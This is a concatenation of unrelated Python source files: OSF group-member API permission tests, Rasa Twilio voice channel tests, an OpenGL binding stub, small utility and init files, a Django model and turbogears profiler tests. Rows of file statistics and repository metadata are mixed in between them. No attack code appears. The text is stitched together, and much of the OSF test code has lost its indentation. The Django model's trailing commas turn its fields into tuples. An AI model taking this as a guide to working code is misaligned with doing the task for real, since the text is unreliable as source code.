# User in bulk payload has invalid role specified
bad_role_payload = make_bulk_create_payload('bad_role', user=user3)
res = app.post_json_api(url, {'data': [payload_user, bad_role_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'bad_role is not a valid role; choose manager or member.'
assert osf_group.is_member(user3) is False
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user3) is False
assert osf_group.is_manager(user) is False
# fullname not included
unregistered_payload = make_bulk_create_payload(MEMBER, user=None, full_name=None, email='eight@cos.io')
res = app.post_json_api(url, {'data': [payload_user, unregistered_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
# email not included
unregistered_payload = make_bulk_create_payload(MEMBER, user=None, full_name='Crazy 8s', email=None)
res = app.post_json_api(url, {'data': [payload_user, unregistered_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
# Member of bulk payload is already a member
bulk_payload = [payload_member, payload_user]
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'User is already a member of this group.'
assert osf_group.is_member(member) is True
assert osf_group.is_member(user) is False
assert osf_group.is_manager(member) is False
assert osf_group.is_manager(user) is False
# Disabled user
user3.date_disabled = timezone.now()
user3.save()
payload = make_bulk_create_payload(MEMBER, user=user3)
res = app.post_json_api(url, {'data': [payload_user, payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Deactivated users cannot be added to OSF Groups.'
# No role specified, given member by default
user3.date_disabled = None
user3.save()
payload = make_bulk_create_payload(MEMBER, user=user3)
payload['attributes'] = {}
res = app.post_json_api(url, {'data': [payload_user, payload]}, auth=manager.auth, bulk=True)
assert res.status_code == 201
assert len(res.json['data']) == 2
ids = [user_data['id'] for user_data in res.json['data']]
assert '{}-{}'.format(osf_group._id, user._id) in ids
assert '{}-{}'.format(osf_group._id, user3._id) in ids
assert osf_group.is_member(user3) is True
assert osf_group.is_member(user) is True
assert osf_group.is_manager(user3) is False
assert osf_group.is_manager(user) is True
def build_bulk_update_payload(group_id, user_id, role):
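    """Build one bulk-update resource object with id ``<group_id>-<user_id>``."""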
return {
'id': '{}-{}'.format(group_id, user_id),
'type': 'group-members',
'attributes': {
'role': role
}
}
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersBulkUpdate:
def test_update_role(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload = build_bulk_update_payload(osf_group._id, member._id, MANAGER)
bulk_payload = {'data': [payload]}
# test unauthenticated
res = app.patch_json_api(url, bulk_payload, expect_errors=True, bulk=True)
assert res.status_code == 401
# test user
res = app.patch_json_api(url, bulk_payload, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test member
res = app.patch_json_api(url, bulk_payload, auth=member.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test manager
res = app.patch_json_api(url, bulk_payload, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 200
assert res.json['data'][0]['attributes']['role'] == MANAGER
assert res.json['data'][0]['attributes']['full_name'] == member.fullname
assert res.json['data'][0]['id'] == '{}-{}'.format(osf_group._id, member._id)
payload = build_bulk_update_payload(osf_group._id, member._id, MEMBER)
bulk_payload = {'data': [payload]}
res = app.patch_json_api(url, bulk_payload, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 200
assert res.json['data'][0]['attributes']['role'] == MEMBER
assert res.json['data'][0]['attributes']['full_name'] == member.fullname
assert res.json['data'][0]['id'] == '{}-{}'.format(osf_group._id, member._id)
def test_bulk_update_errors(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# id not in payload
payload = {
'type': 'group-members',
'attributes': {
'role': MEMBER
}
}
bulk_payload = {'data': [payload]}
res = app.patch_json_api(url, bulk_payload, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Member identifier not provided.'
# test improperly formatted id
payload = build_bulk_update_payload(osf_group._id, member._id, MANAGER)
payload['id'] = 'abcde'
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Member identifier incorrectly formatted.'
# test improper type
payload = build_bulk_update_payload(osf_group._id, member._id, MANAGER)
payload['type'] = 'bad_type'
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 409
# test invalid role
payload = build_bulk_update_payload(osf_group._id, member._id, 'bad_perm')
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'bad_perm is not a valid role; choose manager or member.'
# test user is not a member
payload = build_bulk_update_payload(osf_group._id, user._id, MEMBER)
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Could not find all objects to update.'
# test cannot downgrade remaining manager
payload = build_bulk_update_payload(osf_group._id, manager._id, MEMBER)
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
            # test cannot downgrade the last confirmed manager
osf_group.add_unregistered_member('Crazy 8s', 'eight@cos.io', Auth(manager), MANAGER)
assert len(osf_group.managers) == 2
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
def create_bulk_delete_payload(group_id, user_id):
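    """Build one bulk-delete resource object with id ``<group_id>-<user_id>``."""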
return {
'id': '{}-{}'.format(group_id, user_id),
'type': 'group-members'
}
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersBulkDelete:
def test_delete_perms(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
member_payload = create_bulk_delete_payload(osf_group._id, member._id)
bulk_payload = {'data': [member_payload]}
# test unauthenticated
res = app.delete_json_api(url, bulk_payload, expect_errors=True, bulk=True)
assert res.status_code == 401
# test user
res = app.delete_json_api(url, bulk_payload, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test member
res = app.delete_json_api(url, bulk_payload, auth=member.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test manager
assert osf_group.is_member(member) is True
assert osf_group.is_manager(member) is False
res = app.delete_json_api(url, bulk_payload, auth=manager.auth, bulk=True)
assert res.status_code == 204
assert osf_group.is_member(member) is False
assert osf_group.is_manager(member) is False
            # test bulk delete including a user who is not in the OSF Group
osf_group.make_manager(user)
assert osf_group.is_member(user) is True
assert osf_group.is_manager(user) is True
user_payload = create_bulk_delete_payload(osf_group._id, user._id)
bulk_payload = {'data': [user_payload, member_payload]}
res = app.delete_json_api(url, bulk_payload, auth=user.auth, bulk=True, expect_errors=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == '{} cannot be found in this OSFGroup'.format(member._id)
# test bulk delete manager (not last one)
osf_group.make_manager(user)
assert osf_group.is_member(user) is True
assert osf_group.is_manager(user) is True
user_payload = create_bulk_delete_payload(osf_group._id, user._id)
bulk_payload = {'data': [user_payload]}
res = app.delete_json_api(url, bulk_payload, auth=user.auth, bulk=True)
assert res.status_code == 204
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
def test_delete_errors(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# test invalid user
invalid_payload = create_bulk_delete_payload(osf_group._id, '12345')
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Could not find all objects to delete.'
# test user does not belong to group
invalid_payload = create_bulk_delete_payload(osf_group._id, user._id)
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == '{} cannot be found in this OSFGroup'.format(user._id)
# test user is last manager
invalid_payload = create_bulk_delete_payload(osf_group._id, manager._id)
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
# test user is last registered manager
osf_group.add_unregistered_member('Crazy 8s', 'eight@cos.io', Auth(manager), MANAGER)
assert len(osf_group.managers) == 2
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
| 48.159558 | 138 | 0.62142 | 3,865 | 30,485 | 4.679431 | 0.05511 | 0.04556 | 0.048104 | 0.060931 | 0.855247 | 0.811622 | 0.78851 | 0.75998 | 0.72863 | 0.697224 | 0 | 0.013055 | 0.263802 | 30,485 | 632 | 139 | 48.235759 | 0.792808 | 0.04271 | 0 | 0.606186 | 0 | 0 | 0.106815 | 0.005288 | 0 | 0 | 0 | 0 | 0.36701 | 1 | 0.053608 | false | 0 | 0.018557 | 0.016495 | 0.107216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4b39153a89ae94a6412365ffcfe98a2636e9c7a | 150 | py | Python | OpenGLCffi/GL/EXT/ARB/cl_event.py | cydenix/OpenGLCffi | c78f51ae5e6b655eb2ea98f072771cf69e2197f3 | [
"MIT"
] | null | null | null | OpenGLCffi/GL/EXT/ARB/cl_event.py | cydenix/OpenGLCffi | c78f51ae5e6b655eb2ea98f072771cf69e2197f3 | [
"MIT"
] | null | null | null | OpenGLCffi/GL/EXT/ARB/cl_event.py | cydenix/OpenGLCffi | c78f51ae5e6b655eb2ea98f072771cf69e2197f3 | [
"MIT"
] | null | null | null | from OpenGLCffi.GL import params
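# Binding stub: the @params decorator presumably routes the call to the native
# glCreateSyncFromCLeventARB entry point, so the Python body is a no-op.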
@params(api='gl', prms=['context', 'event', 'flags'])
def glCreateSyncFromCLeventARB(context, event, flags):
pass
| 21.428571 | 54 | 0.733333 | 18 | 150 | 6.111111 | 0.722222 | 0.218182 | 0.309091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 150 | 6 | 55 | 25 | 0.820896 | 0 | 0 | 0 | 0 | 0 | 0.128378 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
d4c28b9248be7fb8ff32d2a2a06b195bfe772f12 | 21 | py | Python | h5Nastran/f06/tables/__init__.py | mjredmond/mrNastran | 4fa57c16e93622ad8be3fb2ed221415ed25c5635 | [
"BSD-3-Clause"
] | 3 | 2017-12-02T05:13:05.000Z | 2017-12-07T04:34:13.000Z | h5Nastran/f06/tables/__init__.py | mjredmond/mrNastran | 4fa57c16e93622ad8be3fb2ed221415ed25c5635 | [
"BSD-3-Clause"
] | null | null | null | h5Nastran/f06/tables/__init__.py | mjredmond/mrNastran | 4fa57c16e93622ad8be3fb2ed221415ed25c5635 | [
"BSD-3-Clause"
] | null | null | null | from . import nodal
| 10.5 | 20 | 0.714286 | 3 | 21 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 21 | 1 | 21 | 21 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d4d698a9b73884c023f65cf8861a8c7d67af3152 | 71 | py | Python | triangleArea.py | suyag/Unity.Library.eppz.Geometry | edd32571761100093902339773dd966ae690f9ef | [
"MIT"
] | null | null | null | triangleArea.py | suyag/Unity.Library.eppz.Geometry | edd32571761100093902339773dd966ae690f9ef | [
"MIT"
] | null | null | null | triangleArea.py | suyag/Unity.Library.eppz.Geometry | edd32571761100093902339773dd966ae690f9ef | [
"MIT"
] | null | null | null |
import math
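# Area of a triangle from two sides and the included angle (SAS): A = a*b*sin(C)/2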
def AreaOfTriangle(a, b, C):
    return a * b * math.sin(C) / 2
d4e6692add9b8ceaaa62b77279450d04787a05ee | 60 | py | Python | main/views/public/contact/__init__.py | tiberiucorbu/av-website | f26f44a367d718316442506b130a7034697670b8 | [
"MIT"
] | null | null | null | main/views/public/contact/__init__.py | tiberiucorbu/av-website | f26f44a367d718316442506b130a7034697670b8 | [
"MIT"
] | null | null | null | main/views/public/contact/__init__.py | tiberiucorbu/av-website | f26f44a367d718316442506b130a7034697670b8 | [
"MIT"
] | null | null | null | from contact_form import *
from contact_controller import *
| 20 | 32 | 0.833333 | 8 | 60 | 6 | 0.625 | 0.458333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 60 | 2 | 33 | 30 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
be2a7efa45e0df8dafe94e4decf964cd6b6f98ea | 10,934 | py | Python | tests/core/channels/test_twilio_voice.py | fintzd/rasa | 6359be5509c7d87cd29c2ab5149bc45e843fea85 | [
"Apache-2.0"
] | 9,701 | 2019-04-16T15:46:27.000Z | 2022-03-31T11:52:18.000Z | tests/core/channels/test_twilio_voice.py | fintzd/rasa | 6359be5509c7d87cd29c2ab5149bc45e843fea85 | [
"Apache-2.0"
] | 6,420 | 2019-04-16T15:58:22.000Z | 2022-03-31T17:54:35.000Z | tests/core/channels/test_twilio_voice.py | fintzd/rasa | 6359be5509c7d87cd29c2ab5149bc45e843fea85 | [
"Apache-2.0"
] | 3,063 | 2019-04-16T15:23:52.000Z | 2022-03-31T00:01:12.000Z | import logging
import pytest
from http import HTTPStatus
from rasa import server
from rasa.core.agent import Agent
from rasa.core.channels import channel
from rasa.shared.exceptions import InvalidConfigException, RasaException
from rasa.core.channels.twilio_voice import TwilioVoiceInput
from rasa.core.channels.twilio_voice import TwilioVoiceCollectingOutputChannel
from typing import Text, Any, Dict, Type
logger = logging.getLogger(__name__)
async def test_twilio_voice_twiml_response_text():
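    """A single text message should render as one <Gather>-wrapped <Say> verb."""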
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_text_message(recipient_id="Chuck Norris", text="Test:")
assert len(output_channel.messages) == 1
assert output_channel.messages[0]["text"] == "Test:"
twiml = tv._build_twilio_voice_response(output_channel.messages)
assert (
str(twiml) == '<?xml version="1.0" encoding="UTF-8"?><Response>'
'<Gather action="/webhooks/twilio_voice/webhook" '
'actionOnEmptyResult="true" enhanced="false" input="speech" '
'speechModel="default" speechTimeout="5"><Say voice="woman">'
"Test:</Say></Gather></Response>"
)
async def test_twilio_voice_twiml_response_buttons():
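    """Button options should render as <Say> verbs separated by pauses, with
    the final option inside the speech-collecting <Gather>."""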
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_text_with_buttons(
recipient_id="Chuck Norris",
text="Buttons:",
buttons=[
{"title": "Yes", "payload": "/affirm"},
{"title": "No", "payload": "/deny"},
],
)
assert len(output_channel.messages) == 3
message_str = " ".join([m["text"] for m in output_channel.messages])
assert message_str == "Buttons: Yes No"
twiml = tv._build_twilio_voice_response(output_channel.messages)
assert (
str(twiml) == '<?xml version="1.0" encoding="UTF-8"?><Response>'
'<Say voice="woman">Buttons:</Say><Pause length="1" />'
'<Say voice="woman">Yes</Say><Pause length="1" />'
'<Gather action="/webhooks/twilio_voice/webhook" '
'actionOnEmptyResult="true" enhanced="false" input="speech" '
'speechModel="default" speechTimeout="5">'
'<Say voice="woman">No</Say></Gather></Response>'
)
@pytest.mark.parametrize(
"configs, expected",
[
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "alien",
"enhanced": "false",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "not a number",
"assistant_voice": "woman",
"enhanced": "false",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "auto",
"assistant_voice": "woman",
"enhanced": "wrong",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "true",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"assistant_voice": "woman",
"enhanced": "true",
"speech_model": "default",
"speech_timeout": "auto",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"assistant_voice": "woman",
"enhanced": "true",
"speech_model": "phone_call",
"speech_timeout": "auto",
},
InvalidConfigException,
),
],
)
def test_invalid_configs(configs: Dict[Text, Any], expected: Type[RasaException]):
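    """Invalid voice/timeout/enhanced/model combinations raise InvalidConfigException."""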
with pytest.raises(expected):
TwilioVoiceInput(**configs)
async def test_twilio_voice_remove_image():
with pytest.warns(UserWarning):
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_response(
recipient_id="Chuck Norris",
message={"image": "https://i.imgur.com/nGF1K8f.jpg", "text": "Some text."},
)
async def test_twilio_voice_keep_image_text():
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_response(
recipient_id="Chuck Norris",
message={"image": "https://i.imgur.com/nGF1K8f.jpg", "text": "Some text."},
)
assert len(output_channel.messages) == 1
assert output_channel.messages[0]["text"] == "Some text."
async def test_twilio_emoji_warning():
with pytest.warns(UserWarning):
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_response(
recipient_id="User", message={"text": "Howdy 😀"}
)
async def test_twilio_voice_multiple_responses():
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_text_message(
recipient_id="Chuck Norris", text="message 1"
)
await output_channel.send_text_message(
recipient_id="Chuck Norris", text="message 2"
)
assert len(output_channel.messages) == 2
assert output_channel.messages[0]["text"] == "message 1"
assert output_channel.messages[1]["text"] == "message 2"
twiml = tv._build_twilio_voice_response(output_channel.messages)
assert (
str(twiml) == '<?xml version="1.0" encoding="UTF-8"?><Response>'
'<Say voice="woman">message 1</Say><Pause length="1" />'
'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
'<Say voice="woman">message 2</Say></Gather></Response>'
)
async def test_twilio_receive_answer(stack_agent: Agent):
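    """A 'ringing' webhook call should be answered with the bot greeting as TwiML."""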
app = server.create_app(agent=stack_agent)
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
channel.register([tv], app, "/webhooks/")
client = app.asgi_client
body = {"From": "Tobias", "CallStatus": "ringing"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
    # Verify the exact TwiML XML content of the response
assert (
response.body == b'<?xml version="1.0" encoding="UTF-8"?><Response>'
b'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
b'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
b'<Say voice="woman">hey there None!</Say></Gather></Response>'
)
async def test_twilio_receive_no_response(stack_agent: Agent):
app = server.create_app(agent=stack_agent)
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
channel.register([tv], app, "/webhooks/")
client = app.asgi_client
body = {"From": "Matthew", "CallStatus": "ringing"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
assert response.body
body = {"From": "Matthew", "CallStatus": "answered"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
assert (
response.body == b'<?xml version="1.0" encoding="UTF-8"?><Response>'
b'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
b'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
b'<Say voice="woman">hey there None!</Say></Gather></Response>'
)
async def test_twilio_receive_no_previous_response(stack_agent: Agent):
app = server.create_app(agent=stack_agent)
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
channel.register([tv], app, "/webhooks/")
client = app.asgi_client
body = {"From": "Ray", "CallStatus": "answered"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
assert (
response.body == b'<?xml version="1.0" encoding="UTF-8"?><Response>'
b'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
b'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
b'<Say voice="woman">i didn\'t get that</Say></Gather></Response>'
)
| 32.933735 | 87 | 0.597768 | 1,105 | 10,934 | 5.732127 | 0.149321 | 0.05131 | 0.012314 | 0.018472 | 0.848753 | 0.817019 | 0.807547 | 0.774866 | 0.768235 | 0.768235 | 0 | 0.006535 | 0.258277 | 10,934 | 331 | 88 | 33.033233 | 0.774353 | 0.002104 | 0 | 0.620438 | 0 | 0 | 0.362086 | 0.138693 | 0 | 0 | 0 | 0 | 0.072993 | 1 | 0.00365 | false | 0 | 0.036496 | 0 | 0.040146 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07851db85005579d4b212bad7904bf16717fe404 | 168 | py | Python | diff_cover/__init__.py | singingwolfboy/diff-cover | e270af76416a536de1c63e4dfcd0f9bd94762668 | [
"Apache-2.0"
] | null | null | null | diff_cover/__init__.py | singingwolfboy/diff-cover | e270af76416a536de1c63e4dfcd0f9bd94762668 | [
"Apache-2.0"
] | null | null | null | diff_cover/__init__.py | singingwolfboy/diff-cover | e270af76416a536de1c63e4dfcd0f9bd94762668 | [
"Apache-2.0"
] | null | null | null | VERSION = '0.7.3'
DESCRIPTION = 'Automatically find diff lines that need test coverage.'
QUALITY_DESCRIPTION = 'Automatically find diff lines with quality violations.'
| 42 | 78 | 0.791667 | 22 | 168 | 6 | 0.727273 | 0.363636 | 0.424242 | 0.484848 | 0.560606 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 0.130952 | 168 | 3 | 79 | 56 | 0.883562 | 0 | 0 | 0 | 0 | 0 | 0.672619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07f83868dc7101b04b92dc93024bd5dd2fd8259a | 153 | py | Python | Django01/App/models.py | littlelittlepoint/LittleTeam | 6aebb6239e5d9cfc419adbd3c9117172be67c0f4 | [
"Apache-2.0"
] | 1 | 2018-08-17T12:11:38.000Z | 2018-08-17T12:11:38.000Z | Django01/App/models.py | littlelittlepoint/LittleTeam | 6aebb6239e5d9cfc419adbd3c9117172be67c0f4 | [
"Apache-2.0"
] | null | null | null | Django01/App/models.py | littlelittlepoint/LittleTeam | 6aebb6239e5d9cfc419adbd3c9117172be67c0f4 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Student(models.Model):
s_name = models.CharField(max_length=32),
s_class = models.CharField(max_length=16),
| 21.857143 | 46 | 0.745098 | 23 | 153 | 4.782609 | 0.652174 | 0.272727 | 0.327273 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030534 | 0.143791 | 153 | 6 | 47 | 25.5 | 0.80916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
07fd15a558a55cbac4fa9c9b7704a2bbafd9c936 | 6,153 | py | Python | turbogears/tests/test_memory_profiler_setup.py | timmartin19/turbogears | b5420cb7e55757d418d8fadb512dbd7803c4279c | [
"MIT"
] | null | null | null | turbogears/tests/test_memory_profiler_setup.py | timmartin19/turbogears | b5420cb7e55757d418d8fadb512dbd7803c4279c | [
"MIT"
] | 9 | 2015-01-27T19:13:56.000Z | 2019-03-29T14:44:31.000Z | turbogears/tests/test_memory_profiler_setup.py | timmartin19/turbogears | b5420cb7e55757d418d8fadb512dbd7803c4279c | [
"MIT"
] | 13 | 2015-04-14T14:15:53.000Z | 2020-03-18T01:05:46.000Z | from unittest import TestCase
from turbogears.memory_profiler_setup import _get_state_from_pipe_command, MemoryProfilerState, _process_fifo_input, \
get_memory_profile_logging_on, _is_pympler_profiling_value_on, _set_pympler_profiling_value
from mock import MagicMock
from hamcrest import assert_that, equal_to
class TestMemoryProfilerSetup(TestCase):
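    """Tests for the FIFO command parser and the pympler profiling toggles."""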
def test__get_state_from_pipe_command_unknown(self):
state, params = _get_state_from_pipe_command('sometrash')
assert_that(state, equal_to(MemoryProfilerState.UNKNOWN))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_on(self):
state, params = _get_state_from_pipe_command('on')
assert_that(state, equal_to(MemoryProfilerState.ON))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('ON')
assert_that(state, equal_to(MemoryProfilerState.ON))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('On')
assert_that(state, equal_to(MemoryProfilerState.ON))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_off(self):
state, params = _get_state_from_pipe_command('off')
assert_that(state, equal_to(MemoryProfilerState.OFF))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('OFF')
assert_that(state, equal_to(MemoryProfilerState.OFF))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('Off')
assert_that(state, equal_to(MemoryProfilerState.OFF))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_echo(self):
state, params = _get_state_from_pipe_command('echo')
assert_that(state, equal_to(MemoryProfilerState.ECHO))
assert_that(params, equal_to(None))
